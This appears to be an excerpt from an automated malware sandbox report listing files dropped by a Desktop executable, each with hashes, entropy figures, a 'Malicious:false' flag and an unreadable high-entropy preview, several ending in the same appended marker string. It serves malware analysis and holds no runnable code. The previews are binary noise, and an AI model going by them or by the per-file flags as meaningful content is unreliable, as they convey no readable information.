          Preview:<?xmlw...0.....$y/w.v..0.._.i.......A..._...J.+...|.".&....IC.\..!.0x.e.D...51..ps..Is..[.._ .F.......3.o.7...5<.H......Z.3..}.D........Rh.S4ys.Q.".T...>... .>F..}..+>..#|....e.....`.p<..+.ly..>.^,..}.M.x...Pq7.......+x)|jU..Q..u.K....+.sV....S$cC...@..5.#...jx........c.a..K|..e....B.W.z..$..C.......b..a...tf..m.....o)u..6)........n.w.[.2s-..y......(....V.L*-...M...o.@a.,.j..Ok{^..y....z.A...0.|i|....s..EWD.}e...;..)f.=`M..q.. .Z.._..[..9hA/.}v.S.....K.1m...(..=..+.enh:.\!</=fH..kV.w0#q.3....a.b..R....u.p.Z...G=~T1..0..P7-K.M>\..mt&..S.).Ofc.U..=..)...../.r.n,..cF.~.$w.FOdC.&...82.w...x...I#.g.yl..wK%i......,.;Zf.....-....X...S(.^..............d...Cb.w.....'..}...z`..+.,.k..d%..%......GE..o2k..q....f..].#...0.7p.+..........g....\......r..o04..)...N../...-.R.E.. ..~....g....Uw.....h..aVB..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1147
          Entropy (8bit):7.825062179099946
          Encrypted:false
          SSDEEP:24:nHtdniYAmeNMBGvchEik6CB62ix+FpIAXMBJoiTkbD:zniYAmTGyQpB620+7uBJ5iD
          MD5:2FA901D2E4641303BDE4166F64A57696
          SHA1:6474720E3ACAA2ED26C58CC2D0B6C3ED745F22FE
          SHA-256:0F21729F0029ACA08721F77BE0F1FAE932AC9A0F522091FD1B5A4828513E1AAB
          SHA-512:F1028208FE165B1E436076FC338417BFFE6ADCB25FF8BE7F091242B4E3BE116B6F7A6CA59D8AE7CFEC323269B4395BAA446D5F1D5226456A2BC3262E1F44CE2D
          Malicious:false
          Preview:<?xmlI0#......@....5%9...B]i.@.@...s\E...8_..Ro.......>*.......q.t.0.F\.4m..h...q.OqvLZ..m.G>WxK4S`.y.Nam...-........:;jw.\.....S.h s.L..Q......U..F.Ib...9.k..S.|.......[....C.B..6.....b..3..t,6r.I/T.RY...\|.G@..g._!..v...:...g.U....D.P.REw5."#...].N.~.6T...o6...G.Q.$......IR...;.9..L.O....h&..+..S.......c.A....,....o.+>2.x.]...s...*.o.g..S.EY....TN6.I..r.J.|.u..n.K.*e$.....C..3.@".../..G..^....?.s...\|.)...A...|....Kv.4.U0u..=n..`.^...MF.x..V..T.;.t.........v.G..x3....N.e....O ..y$.h.%jz.C.......,.;).\..u.6^y"..ffgm...*U.. .. .......G.h.#>._uX.mPls...\."..x.....a<.....H...k_..!.>./.....4D.............B..}.......Y.6.=...zH.F..n.....z9..h....5\.....L#..S$...~....@.y...?C.0a.6.1=.d.Z....,...5D.}..{V...uNsp\vVpB.{e+..w...TT....I.c.FT.....%...r.V{}hk...p..^~nhJ9.........8..bh.]9..#.v.......^..T..6`!l.{..?LJ.%G.a..^..I.k....Pn)..."...zj.n.@9..$ ..._.d..N.(.k..z;..<.DS..G...1..QX].;C3.H0...F..4.Q.UK..h.jb.G..v^.A...Y......p.I3..<YH.].D.....l
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1141
          Entropy (8bit):7.798819379387175
          Encrypted:false
          SSDEEP:24:TZSD53/6KN106GpxVgOXc+QRxdfNQpCZT/YibpYJ8EyniTkbD:TZSD5PPNQzVrc+QRbRZT7pYyviiD
          MD5:F36012FFAAF1C16D573A1FDD39E2629E
          SHA1:F0E6F52D988B8ADF345A9847218C11AB1AB75BE7
          SHA-256:7D6E1AF39663A456471F6386ED81DD5FCE9252ABD55BC09622D33C851167122D
          SHA-512:CD9D4CAE91342D11FF860DAE81D5CAD36F9E8088DB2B7E2D050045E95784F54DA61ADBC1A3540576F79C3FD81E7877DF8790040170990DDFB4374085C0070965
          Malicious:false
          Preview:<?xml~#U....Jo.slE..[.v.8....4.:3..;....XH...I.".....5.A..#6.d....q..v9.=.n.@8..DY./~. &.+?..'....~..T.P.....GE.xW^Y.M..6..~....[.[.]..3...!.2mr.P.X..u...=|...=V...Se.O..Rm3\..f..yQ...&N^$Q;...........>._E<..aj....~...4.9...O.[v.T..t...A.V`..........u.y....s.;s..y.....b.......X.....f.._..gx....D.....e*.....mxc..K...Q..o....c.?&.$...G....Wb"}.`r...:..A.t^..#%.....^.h.^f.H.M.M1^)..Cu.....%L.beRYV..sy..,..<>T...H.A...J(3..j..g.s^"...~G.............E....9.j.m..b..7......G./.x./.r....2..g.K<.@`s2!e..(6...k]....RH..VE.t.2..I /.....bt!.T.......:+.d|6...P.....JN..-.X%._.....V.8..;H...Q_'<.%_ea]...3j.Y.m...;....X.....E..=P.k..b@.;_.r..`yL}..xr.q.F.-2$y`.?z${l.kU..I'..li..-..0e8'p>0.N.....j=k......b..Y.!eh..e.-Zon.TvmSg..|.On.P.A=..kXl...8/...'.IBb:0.?..):.$w8\....~.M.+O.iz.B....I...g....Q......n..16..+.H....j.....n...d.5r.....n+KQ.......*..M*aV....Q..X....M..h.tC7`.l.T.c.6...4...Ms..^.Dg..V..f.?.p..n.`S...D9..]b...co.T.*...s....g.wRV'x..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1145
          Entropy (8bit):7.817526403595995
          Encrypted:false
          SSDEEP:24:zQV30rWYxeNKyLDddkQd/g8uqK59Mg5hECqf957XQ2ZQrwv1Zs/iTkbD:zQPYeNKyt/yggLqf/rQ2ZQMsaiD
          MD5:F47DE83A1E62FA6753E9AFD649B826B4
          SHA1:A001D750994927DA469E303FD65C4E3A1AF00A74
          SHA-256:F6CE6CB92436953D3301501278ECBCB37A92DA783353A3D7B34AFCA0B3E6DF5B
          SHA-512:30A16A3EBE7F90CCA8FC1BF1FBC605B30A8BF4B3E7504FEC9CAB51C9E0994A006C5B91C2787257DB1FCA0E0FCD662340911DC22FD658303B0A1939EEB1C38CDC
          Malicious:false
          Preview:<?xmlw...8g.9..;./..I....g.^.......G-...,..x......0..z*.m.G.|}nb...cm....Q.n...!i...3.0,..^..!..m...Qm.....*..;..Bn.hQ._..vl...2.j.4...E../.O....$.t..@Y.m..w....D.n..\.........-...i..~\....G,g..h.z.2...1..<..b...E...c...g..KF.7@..r"=.:..[.........H.1.g.Y.U...`......I........xt\....R.o]......M+..F%;!_......5g...o:%.....H.....(|.V..Q.{I...B..aF...A.z..a*.h+T8!...&].9.|......OI........;Y/,.b.....Fk;q.t.Ar.....]i@.S.p...tI...;...K....v...i..<j....q"..oZ..........".uA.&.y..^.:.E.~....4q[.\c..p......J...W.......2/[.@..%qI$.0....G.#.%6.F,.f"..72.5....T.. .H....>.o".....e.5s...Yi5h...O9'.|R....{..F..g5..KL...P"I.bjR.?rI.R.. ,n.H3.......o..7....C.....J.....>_.......U.......b.".e1..xP..n..7T...`.s~.~.2...O#.^..).......'I...qQr.i$x.!?g.@.m.P..;AW.<.....y..qF..jiO.F.e:..\...XvH..^i".+..y...P.T.G4...D.U........t.[/=.t|..[{.Y..Y..7.F..wr..c....H.. .bB..e..N.q... .]R"+...P....#.c.ljfr:.^mH.g.U.0..-..G>K&.@...... w.<F..S..dm....Y.!..R..$....&:.{..<.'.s
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1145
          Entropy (8bit):7.799275723442708
          Encrypted:false
          SSDEEP:24:MJNo5vUeO00mDIYoHxYPqsDttvUr4wj53KOoK+2d5Xg8qiTkbD:N5vUeO0HZoHE7S55ToP2d5XPiD
          MD5:4D012C8042CCFB30964A6D127E232A2F
          SHA1:0DE551535E4DC513FC2146CF1D69582A09C3D94F
          SHA-256:325EA017A5DDA391DC756B86D73F20D3F3D1BBA0B1766F9DD41F0C6A68065756
          SHA-512:BF9AF2356375EC23797705F426E2F06B88A7DCC9F6DA850B7225BA8AD350039056BCAB2F72A46128142A7DE398B5E6F2040479876FF066C952C27515A427C6C0
          Malicious:false
          Preview:<?xml.U.96....@..5.N..z...G.....U.2.{.-..e.R...*:@>.by.D_.M......<)!E|....Q{.*.%.%E.5e$...\.[(l.t....4... .F...z.#........G.Q.... ...w.I...-.$.S!.....&!]...]MM..5..B..Y..Dr1e...?.a.6..$.yX.}....bt....:....Z.;...p........[3+.Y.||.F.#M.\.e./N.t=...o^.?I.57T.ggkF5..A....fC..0h..(A'K.qu..E..u+.p=e....u..cf....cb&QU.u...r?;...^.I.[..Wn....w.....5....0[.VF.*T.#\....%.2..Q..'I.<.;......B}os\....r..,..RD..D..a...?.T.; ..-.7.L.@6d..Bb....nn....v-...K..........;|?.P.l....d..u.y.....F....L.A...ObN...T.?_...........#:.2....qO.{.l.r..............?..........F..XS..*.WP.O.....6......(....G$...}.^.<...H.$~:ey:....0>....V..e!...M.,c.vK.L.....M..G..@...Y1^.,5.%HC.>.>K...6iM%..#!D%tW.w.t.o.1[.k..Tz....!H.8Vm.$.1J.W%...s.b...R..6TF...6.e#A...eZ..tn.....0Lv.NJ.K.yR7.. Y6.F..[.....K.,...o(........w9...Y.....u.........^R.9.e\..#2.m..q..!hg.........p..V.2*...*.^.1.K..X.3)..^H?KA2....R..w.50UD.YA{...>:.i"c.+.F..F_..).o*._.....CIft)..uN......u..ev.|!}*.../....v3.u
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1145
          Entropy (8bit):7.806679351729663
          Encrypted:false
          SSDEEP:24:qYc1iP/guCp8vCCdLs2mHr+ufUAVZUgW/P9Rcc2XPhvUMLsIfiTkbD:qTc/HqCdLsxKu8A8gW/VRcc2XbciD
          MD5:F2E7535816BB6F4FE75CDCB933E5B934
          SHA1:CE335746C7BC6EA529D54BA463D59E71FAF3AE36
          SHA-256:6B238D74B67070F62CB349EECBE7D1DAE9CE5556D068DFDA6FD50BE1CC673320
          SHA-512:99333FE3760110E9F90E55985D7BE95054C9E949907E8D678168868B63A7E3C8C3D1BBD076EE3B9AD8317B9695A889C86B19B67D1D396F811625E008056B0DB3
          Malicious:false
          Preview:<?xml...vz4...Ly.h...M^L.vi......"..t.]|...xN...g...x...bZ.,.#b..H..(...=....nh. @...5'...{.M}...y...z....S1.h./.....%DC.wa?..d). >j...b.O....'..{.%.....}..V..(.K..q-...N....&x..E..P..`....?{.L/I..........DA8..=!h..q.[X...O.T..V..w20.=....5p.?.. M..`.0.z....B..z^.1..'..r9f..C.S...V=usn..".{.W..y..b0.d....Ea45.UREK.$.dO\......O..x.....v_.>..s+.^E6.}.x..j.3.0P.>!.....N........p.9.{.Qk...#n..2O)K.vt?."...6+.6.{ue.<.....6...O.?..Z....gyNa1K.a.."..7.b.U-W....1....|C..!.K..U.w(...w.%.xg.i.......w.}......5...gF.#..s...Ehd..8.p~Q.+..X...OOA...Az.I....E..i...q/...+G....T............<4......4:....;.'_.rd....fW....@h..G.9....7.Z....f.....xN3.8&.k..+...*PHz.}..SYV..I.&S\Q...p.`.~K....]>....yQ..\?..7..Y.[V....U...6...N.......AB.....j.....P.j.........(..d...-.tO2..........P`..H.}....7.O1..z.mK*J.@..<..C).S...MO..\...8k\4.i.I5f.m......N.-(. .H.b#......PN....N.....]f(T/.fCU..5..V.5%..y;..{..N....T_{.D.G8..a..1.k....MS.U.l..Z^f.Wqd..y.>j...n2o..C?.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1144
          Entropy (8bit):7.8057647702696595
          Encrypted:false
          SSDEEP:24:dOpppyVOVYYEJxrV9iBjhYlTiGRrpnMEnY8Oku6fiw/u2QqiTkbD:diwpkB122ort/Paw/ciD
          MD5:6366126804CF2509C53A887F76903581
          SHA1:80D1128D5F8AA051F99C5FCB9F9AB433DE08BA65
          SHA-256:EECDABA75A4E6469AAD73185AA319474067387827436E1835597C55AEDFA4E5C
          SHA-512:6E2F91F2B595FB95B6E95B57018894ADB21166A32BB4C74EF196421699D8B349C40352402F47E2DFA8022627752B8EECC3667F561C920126C95ED15CB298636E
          Malicious:false
          Preview:<?xml9..5}...c.f.....C..=. .m.....)=7,.mU.5aUTt..@.>S..d...p.".n~.)7I..lKzJ.UMP!"........,..^.y..{.D.X:.F.]..M.>21I.A..y..bN....X.rM..L>..]]...2..K.{....o(.gXM..s...*:Z.:....t.U..j......n.]$.xx.*.6.0.:........$..K..9.b.......K..n..g.Am.a.C......x ..U/.R.W.6...n..~.M.l..*.."...|.]...I.-O..C......f..x!I[1........}/........I)........Y....wU.t.a..i58)....@...;I.rH...JW`'..S..">..w$.|]....>a..:..f|.J.....{{6.... .....,.q....`Af.G../.....R...}&o.`|......v...^v@+.>.jd...^O...h9....T|.T.....K._...D...4..L...s+...@;#.%...>V..(..R...6.~...\...-..(y...........~.bv.?.bGb&..HG.wj..@.Az.Y.,._...W.>u.x...,.UN}D....-Tv.dG.m..M.G0VU.NG.Z...$F.-m..].0.a....5b..L...c.S[...$...J..W..[.r.#..jl..\.s*.1.G1..Gr.....*....Q(z"..W...DN.`.......y~.sC.5s.yYw.-D'.......7.@...l@..w......1;.....%.._f.G.V.S|.F..?.-.....;.n..IT..............z..L..U.."d1...A.x..Je`./4.{W...u.e...3.O.#B...n...4.AF[U....$.....#...1......1.....s.VA(t.6-q]+.I...!}.6b!. ...?......l.q.+..]
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):848
          Entropy (8bit):7.7125325881294575
          Encrypted:false
          SSDEEP:24:gbB9qXM4S9Pcxw/ekW5J2VrEFr4akqf6+hQkiTkbD:glUXM4fxsWmVQZDk+6+i9iD
          MD5:94A3DA878CC57B19FDB52EC0D193C66E
          SHA1:E3679DA28019E95F557744E0BBB8683D650CFDA6
          SHA-256:7A30D4792015946A1A6FD207695309925F630D031A5E6EF985AB797A66EF8993
          SHA-512:3C023BF2560841F94B05751D630ACE4A6CBF93A07BC5BB3347B9D604E4D649257269B88EB09F5E92C92C2900F4D0C90619F986296DF63E6201369B4E53D8063C
          Malicious:false
          Preview:<?xml..8...7l..2..3"......i.E...C.u%[.@.A.Sk.r.H..z...9.E....O8.P+.......)8........(.......>6y.O...+......./..!..5.;..4J..p.nJ..Ee..3...............Q.U....(.,.....Mk..^{'..8Y.RB..C.;...Z?..H.....09e....m.q..c...A..|....7,=QA.......@.EB.B..h>.....}.g/.G%.-1.=..z..../..>.W..a3n.9.f.5.....S.W{k....:]y.......2~U.D...(e..K.p;..U.%A.....!h.H..W....,...6:w....L...k8U.a)OJ.1#S..=*.*..L.&.....e....q.o.&.J_.y8y..4.... #C.n...A.Va.}o..E...o..M..k?......7...}7..v..~.......D......?j..H.."i.....$.hE.......#ze.G.m......j....9n.}D....j..}<....Q..d.U.....$S..R.l.!.w.......N.d..i3.*X....m.D..w.h.=....b..P..%m...g..G.%G.........K:.A.!C.E_. ..<....}....=:*9H.m.@D..,..>......&.?..r+......=w$Y...............P..=..........g.^..Tr....o..B..P.3..<r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):767
          Entropy (8bit):7.708952572801094
          Encrypted:false
          SSDEEP:12:MYdELSxOIlK1QQNOKhAzBlvltUl5qOjedwczXXLeOcQvh3NJEi47/pPQmo4NcViq:LdE+xJK119AvvA5hidwTlQvhN47FPNc7
          MD5:818C22A5F955A18C48D93D0632FD96C5
          SHA1:913B7D2681C42FE0A33A1C22D49843AFD6370CFB
          SHA-256:CA507AB7E8F5127B49DC631B19291E00CF5C47AD12E17A6C36F54E68E24D1971
          SHA-512:AB645972D2AA592476BFF3ADF7182B4F2A5FABB065A8EF3C124E24FFCAA27B0B0C04B064CCBB94DE8393D948B4EEB317D1F52DC102BCC77C5E51A944BA882087
          Malicious:false
          Preview:<?xmlq.zcMn.g.7.9.....:.T..?..K.k.|.a..x.C....4H.'.>`.Q..Y...qb4xH.....)@..Ff.........%qh.PK..hl}..[.w..d.....<.h...\.....x&...tP.!.f..v.P.w...<.:P...6..]?.....0sP..C...!*.'..o...#.H...p.........x.._5.C..2.....8I...<%....P.)}}YT..K..?''.x.@...^l`9.....#.p.i^...m@.QEc._..'.wI.ox.1m..2....}.......7.[..3g.^.W^.d..Q..?....:1..@hu....n-@......`.*.9_.h...B(,|zc..= ....J..(C.Y.y].$.inH..Q.......\@..=.v9X.b...Pb<...#....I.L..#.Wg<...&..[.-...LS......Cf.[..^...SXw:P....7[......nvy....,.g.....%.mp..Z.y\D.....52.........S.G...Q.NY.,..O.'.....nY...Q...}.;f..f..x....m....rY..5.3........R.....+.....^......?6...D....}SZb.Zxv.]....9[M!..J....H.R.....u....L.r...a...g...&r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):845
          Entropy (8bit):7.749687184977416
          Encrypted:false
          SSDEEP:12:xThCX+j3Ug3din3n+jLq5gf/0wq3unFw1g35BdckhoLsM5DL3asELZixpZacii9a:dhw+b3dsKtk7sS2DdOxdWiTkbD
          MD5:0E5E54A58BB9068A41BEBBB5D02D491B
          SHA1:F703559019A8E76D5234BB05DE7F397A90B412F2
          SHA-256:1063DC7C89F097BA85D95D6F9F1951A476D748FA2621B12B03A612CF58F59149
          SHA-512:0FAC5A21C701200AEB6E0EF75A3AE1121568194B1F91F648109C05F7603BC67795697780EA56CF990B04EAE4A6913731E78C41C9D42C1901C97C4B1CCB3FF19A
          Malicious:false
          Preview:<?xmlr.lj.K<.y.|..5...XT.s..jiS].......U....C5.4...|..q.G:..F1..t"%0'.%[.:D.#.0.Wgp....HO...fhs6...-..%..G..'IT,.Fw.~g...%Dm/....R....N.yL-..u...Ci9.#x...Huwt..."2....(.m./.h..am_..Z.....o\2j..0....[.}.Q......d`+..b...h.o.}'....W]../.$.....R..w..k.....".!1..k............Q@Dd.'~.6Q.f...#..._..GG.Id....`o(..'...........]..)u'.fb.d......$.g...!.:}...Hb...I..L.xr.E........].:U..Be..Cp.mC_;z.Za....%.l.j..PZ..G...oV...,...\...X..>..H&....v..@..>.N.....F/.Zc..9...0'.4(q.........K=..&....@z..&H*...m.Me.A#..F....:.+Y#.2..v"..s...P:..I.U..9g....TM...G.a..AU6....hq,..R...~.[..e)o..(..k..7..F.....$[g...|..h.$..^..9>...~.(..6Qyp..\.'D.=..9gna..-.....X.I..V...oK'fg.X....f.u.-.=Z.X.R....p.!.=......x.N.a..Y.......7.*.^z.....(V!.,..%.....d..1}..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1233
          Entropy (8bit):7.819353809075586
          Encrypted:false
          SSDEEP:24:ey3Ig0knb7jDIIc8vIXp54sQXcoCjsVHkhre0puTGTpJ47TP/liTkbD:lIg0sL32Xb+wsZUrSK/2TP0iD
          MD5:C8BD0AE71D1C82A44ACE6CBCDD7FF1F5
          SHA1:C117B4964B0E75A6AC6A67610FB8488EA3CAB80D
          SHA-256:C6FB4921E2E3A82674F385ACE967C5726B9921C89D97783A5EF8A7B7A8266E10
          SHA-512:BD4EF005EC2A74F28072628718C05D54B9ADD3283F69959E74BE16D48FF5A9BC01AEE334622CD721F4A21FA6F4F255FC5C254CF192130928ADEC148F2244DD55
          Malicious:false
          Preview:<?xml...ra.G.....".Z2...G....|....0b.....@.M.s.....k..kqqz.GC.U..W95..H.m.<. J-L...rz....G0nM......~."...!.....=E.6+..pbA.%J...D.=u.x.......5....WWB...P..z+....}./U`..O:...r..|...Y.-...B.7....'..I.[...crWg..<...D.sW.....]:.k.?.(.......Rj......!..s.6)F.......T.R6....S....H...d^...b["..~Z...NL.kI......Y...v....X..e.|..vV..M./....M..V.i.....m.....!.XJ.A*X#......w.=.4..bhX.UC.....q._b\{.*..M.*X.....i.F....P.IZB....z..s'Y|...9A..H.....`..j8....@K.._.v._9........FP.....(&..Q...C...6._..]..BG{i..)..X..P5?.....%.=j...5E..%.%@.,Oq.........e..|..g... .B4*.]pNbX3!...K..<ZG..c..H.IC.H_.......w.LZ.Mg.G4}...#..2.].6<.i8....I.....Q....\.5i..U.n".t...9.....Wi......N...\`.G.N9.Y.c....`..__`!..5.5....C.]......M...h55...Q...Z.x_y{qL..O...zn.f.Z.!.....+.kW.{{...2.......A...{J.L.[............8.k..lb.....q .Y.R...&..&x.....:.5.j6....)}.......|...H).....'i..S..7.}.a..5.<.y^.=q.~0Z.G.}..-p.I..H2;Q..e.F...'.u......5..zu....D,....^.(....m..Z..<.r...[.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):934
          Entropy (8bit):7.778938295902895
          Encrypted:false
          SSDEEP:24:GpoVOi+0pmwVAPJDBMkS+TjuPAVLZ0Vt8IzgSn4sD6OiTkbD:FOingw2DBMp8u4cVtL4rriD
          MD5:94A475F6C82901187492B138D6D2050A
          SHA1:0323E694B724E81805C0D5C598CCE0256D548E41
          SHA-256:7CD766ADA88096112FB56422C0A663EAC4AF1534935FA702070485CD719FEA69
          SHA-512:B1D592F0CBE25A0B8B49A367AE1CA562ED62328B9655087F17EB477CD32BFF34FA124396C8588EBB1E8D21D07E87D78FEF7780CC9359268242D412E0F97A8C73
          Malicious:false
          Preview:<?xml>.p.S......).....5%i...... ....R[..l...b.....]..1Q........b....-......c....N.F.C.....&.f..3^e..S,...h.*..?/..>.x.......7..={.].<WV.k....-WJ.E....c....E.*/...H.@N?4...;".%.h.3ML.Bo.(...:.r....z$.......Y-..\T..........2...U..*....w.....$...?....m.........n.D..h...8Yx.[..>..g>2c.`..@..i.....y...F.N.pi4.......N.K.>8._4M..........,...|....bR......p..qO:....a..=.`V.`..b....v.9....J..:u....... c..6.......i..^..EW..\.....e..z.....un.'~%_x..U.|pY....~z....=..E'..-.....Y1..........Sl..T.4.o.hk.e.... ..i..e0.....p(....8.o.;V.......?..6......S..I..Db8(F..%%........!=.2...Z....w0.I.A...1#|.j.._4......&1.,.I.x.b...'s..H&.T.2.y+.i..kp...<.`...<.....N.w...f.RPk..k.8:C.(...Z.*O8..p..s.i...5C......>...L..v.n/m.$.N.....j.4.N-....5!3/9%..V29..&...;W..V........'.?5N....{.x.....y..2'md~.7)<,...#.....c...U.L.T.i.kr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):969
          Entropy (8bit):7.759658071851658
          Encrypted:false
          SSDEEP:24:Ai5EVfsEVkug7YhRhm8QYGfQRRagLmKgEU2W1iTkbD:FEaEC8kYGCRaRX72FiD
          MD5:4650410826C7446B2056588079904793
          SHA1:EDC46F012E525686DBFAECAFC0ECE056C7440DAC
          SHA-256:815D87127B068D255584D2515E71524B39D467B52DE95E48952F290272D48B7D
          SHA-512:88085D84D713F5430CB44CD453C1E7F23D9FB6EC31CB711786EDBAEC3B9714C35D1FFD96C670E1BA139ED1C8FF857DEDEC728A824F3D796B504E454834688019
          Malicious:false
          Preview:<?xml..x......7....!0,".7..R.S]&}...........G?..+`.J.[...~.Y..b~...|^+wA.X.}.l%.'.,A..."*...h:.X..b...{V.....S...%1.1?... ....S...c..O..r....|..`x.Y.*-.Y.9R0R.}.:.r=:.%.....R.}od........../..=.l.b.&$.%.S...:.:=....s:l|{7>..J..IZ5.Lu.t....q.Uc.M...r...V....3vTU........E%...... .r.....$......B.ENW......av.....'.F....}OF......,6HBP)O....o..Z..yP$m........Vv..8+...\....b.6_.5..."....[......l...x.u..ul.?<>\......h...:.v..#j.RfY.b.U$..N[...T....u...n......Y....?.F.o..^.1w...4..|.M.TUF.O...6..RT^.t....5/4n...$c3N...9.....,.?.......J..P.6..B.P..3.3.........M.3".'..f.$.0.f.h\E._M.uW......M.u...B=...i5.^..`d. ...\T .l...t....%B...zT...S......+.4.B..x...|.O. ....v......@.....e.$.....O..!...J.q.b......\Y..?....y..23..Ze.I;4...6....O...d........O."t#...u..q@.6.7.K.....D.|"........n/.j.s.D8....L.v....b<x}.K...z.......;Y......S...l...M..LN./r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1467
          Entropy (8bit):7.867965432009921
          Encrypted:false
          SSDEEP:24:Wr0XrIWVR2+B34QRv67CW5bIPEDNpz8kiGp07BAXnRoPd+mHoCwhYGIiTkbD:9RM+B3VRv6N5bIPEDX8kDYBEqPd+ZJiD
          MD5:B98C6313E4F3E90DCC0F18F0587FE638
          SHA1:653850B52DB39286EC14532EA4354261E166BC84
          SHA-256:A74A5E5C77A68D4980BCEAEEBBF2186718D4F19CF72226FB0E46CC9FBAA705E6
          SHA-512:C2560B065DF70EC7D7A7D6CBC0651A5C4FD7C32490B3E9A26E108A5BA65A7995D1C2A2B731AFDD85E79B66424D13F0E516FD73A56FC6FF247923B13082E831F9
          Malicious:false
          Preview:<?xml.F,.<.j....v..^R......l.>.....&q..ct. ...6...m....6.....r.X"<=.._..<.....a5@.U1_=X..GL[*..\GF.#.o...W\7....a5.xG^<.....q..J.~o.+q..B}<X.*.}k|t...l...V...Y..o..B.\.....$.aX...O..H..n..,g..Z.".q..l.v..Y.Z..B.E.ur.j-.....D,..{....K.#J.H~#.......}...,..n..=._?..S..N:N....n..Z..i7...^.s+H-..Q.....`.ji.h9n....3.|(...Zn.04..V....[..9%Hu.....d.ND....G..[.........".[.!..'.....7.b:D...t.m........C.O..x.U.H..s...S....,..../...A....{.8.L..jl`.k...^B..W.h..X+...:+...~N.0...b..../....i0.l...cM... .G<.i.IN(S.S..!-.eV..s..1.S..*i.}.D`.e....%....5....W.R....hI4.....(.cL...^..X..'.M.`*.A..K.......#.X?`.)FK.m..4J...c...6H4.v.Cia.m.`X.!B,1...}f..u_..W..#~Em:k.'..JW..4]@Q\..9.u..t......2.......0v....MO...b).x~. %*..qF..........yJ..^D.FH.....5#.p$.W@.K.%yKHWl].7>..78...:W.GsPN.z......|....q...bo.(...%......&2..VG...H6..R..;.F....G=.;..7.`....*7. 6.$ba..^M.Y..q.,.d.e..o.........>..Mg.9A=.u..8...(%d....Co..8..'d...f..G.=.'@.rv....Y..k._.....].".D.....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1397
          Entropy (8bit):7.847367396203102
          Encrypted:false
          SSDEEP:24:gcdACThMXdtSPtMUD2d/BYFi3RUCzQENFmr5Hr6pmCyKO5dRhQSZviTkbD:gcdbodt8Khd/BYQUCh7mrZupmCZeHQ5q
          MD5:0375109CFDA48071773D5962E7E44956
          SHA1:71EA6513BF1AACCABA8FB465EF16242CE4B73FE7
          SHA-256:B029ABC298FF2207FE74A6479C3ADE0138DF42CFDBDDFD8B3A705315105571DC
          SHA-512:C1B53820052D3D2D48F7D1A7DDC318CB1A57CDE686012842307AB5F8DA287D0B0EE73721B44B6064DD1011C9794AF1641A47C1E3516B8E2D5C506FD30E3232E8
          Malicious:false
          Preview:<?xml]t.G...U.....6.q..u{..^....4W9S.....-..9...z1".e........y`(....A.p...v...B.p.%ovpl........@.s=J....Az.id...R..d/.....x..j......Z....?....r...q.....~..g.*Re...\(...f.p...5..K6.'9.X*g..)l.c.,.*A....t.X..op.]....n..}"..m.....`D.r.....%...'..s {.I..a..X...|.4....9|r.@.{....z..Sz....U...Lu.,.....X....U...n..._..+Y.....s..s.q@I......H8x.....m.....Ae.Wm;........C...F+..!Ea.>c.|]:.c.i.(... ...|.O*}.i7.Sd..........I.....%.....;*......)....3m.ExG.Q.!].....TA..De.........f..VAR.U.[...B.1.T.b*.XI.....>...-Xe...9..p......`t...../.1..<.|...>..bf.Q`5Ox.}.j...@......>.....X]..1...0Ys...>...2.|.:gu5..v$....KMC+.... ).+.&[..g<.g....c...*....7..l1T<.K'+g..X.|2Kk..`bV.c%9....?..Z....?..|T.QqlZ..\u<...q../..^...p.;c.!x.o.F..L}..a.X...b.'...lD...Z..)Uq.'..&.l.n&3.n.+.....5.R..6Xj.9:..............aT.*K...<..#......d..<0EA_C..../-..r.Y.L.O....&.C..A..Vn.AE.;.F..O.J.v=.......Y(.......i/...U...N..C.9..;.2......W.....8.4..!.y6..t.OQ.e....).v
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1269
          Entropy (8bit):7.838248266909296
          Encrypted:false
          SSDEEP:24:CY9pV+R3Ib8iQPv6PrnZJ5F+y5rg3xPjcg9h661ZUX9psgXc7C+riCRAuFsQiTkX:bXV+R3IgiQPvErF4y5exPl9D1iDsmoiC
          MD5:DC262B4BFE8E02EDC6D3A94A6E4F3836
          SHA1:2E40683148D05696861A94163116B3B7E19BCD1B
          SHA-256:DDAA643EAD06F3DCEE1584099F1C4D54347E49E4E873A14532E73EDB8F0BCF51
          SHA-512:EB31E4687E2FF63B85F16EAD81849CD378208988B2D645B60C376EF139142800E1F7A55456219E45D6616730F1591C92755420E9FA8D12BBAE2258A292F99428
          Malicious:false
